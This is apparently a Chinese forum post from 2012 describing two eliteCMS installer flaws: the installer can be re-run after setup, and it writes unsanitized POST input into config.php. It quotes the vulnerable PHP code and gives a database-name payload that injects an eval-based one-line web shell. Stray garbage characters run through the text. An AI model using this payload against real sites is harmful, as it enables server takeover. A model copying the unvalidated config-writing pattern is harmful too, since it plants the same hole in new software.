eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装9 N6 K* L2 ]6 t
: k3 E4 ~! z) N" Y% r# e* j
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php% I" j3 _* s! u
我们来看代码:9 T: i( [' \3 C- K2 M& ~& z
; b p$ p- I0 V* M/ s...
" G: m0 q" W# l6 W+ ielseif ($_GET['step'] == "4") {
! n/ {: O+ @1 A& @ $file = "../admin/includes/config.php";' S9 K/ w3 M2 s9 \, X6 i
$write = "<?php\n";
/ t' N) A5 C5 j. ]2 V' ^/ p& P $write .= "/**\n";
! R6 b' x3 m2 |- o $write .= "*\n";; B6 y& V$ M5 h7 t
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";& t( n: t7 i8 m
...略...
- l4 S& A. l6 d% j $write .= "*\n";/ W, i3 s- ~# i. {* @8 h# t
$write .= "*/\n";5 H" Y! l1 q0 D! F
$write .= "\n";
1 E+ _: V3 k- a $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
( K& ^% ?, ~( B $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";- q9 v$ y: L( R; p5 o, w# P
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
# s3 M6 z% l$ N$ A# w7 f $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
0 ~! W1 e- w; d! y* @ $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";% } `+ z: l N5 L: p% C2 D: A9 k+ S' k
$write .= "if (!\$connection) {\n";
3 O3 u/ q" x/ ^: z# G8 e $write .= " die(\"Database connection failed\" .mysql_error());\n";
! q- I+ S* w7 Y% Q% w, o, P $write .= " \n";, `( d4 L, A3 `. p: J
$write .= "} \n";
4 d6 C3 F' P/ S) @2 U $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
% o% r x0 w9 W& l; X $write .= "if (!\$db_select) {\n";% j1 v0 E/ [) }- b# j
$write .= " die(\"Database select failed\" .mysql_error());\n";
# j/ a; C% @! t% B9 l7 r; ^; K $write .= " \n";
9 L, c% h! o# j; W $write .= "} \n"; N6 `: @, J5 N% E+ Z6 ]# w
$write .= "?>\n";
/ L8 b% E. r% a- P6 p( Z
9 Q! G* e3 D, \, `/ n- E $writer = fopen($file, 'w');
1 Q" v) b2 D, X0 {; w4 c. d...
( ?! u! G( L, M6 [
+ A W) |& ]3 o2 z1 G& [在看代码:5 E: i* o. b. p* [" n
% b* M! w- U# k. {( ]; y [$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
" y5 b3 [. J; p( J( O# ?$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
7 x Q0 n, v' b4 Y; Z$_SESSION['DB_USER'] = $_POST['DB_USER'];3 P7 ?" W" Q+ [+ A5 `
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];& a& c4 l# ^5 @5 I* u% X1 O. {# t
, @# q9 E" f; z4 M; x取值未作任何验证
$ f8 f! |" N# m如果将数据库名POST数据:9 o* E2 C2 k; e
' r( }- B% N* K, f* M"?><?php eval($_POST[c]);?><?php
$ K! y' v6 E: Q! _. F # ]" s9 f5 `+ z( O- `/ Q
将导致一句话后门写入/admin/includes/config.php
/ l$ c \$ G5 q3 W0 i |
发表于 2012-11-18 13:59:27
收藏
支持
反对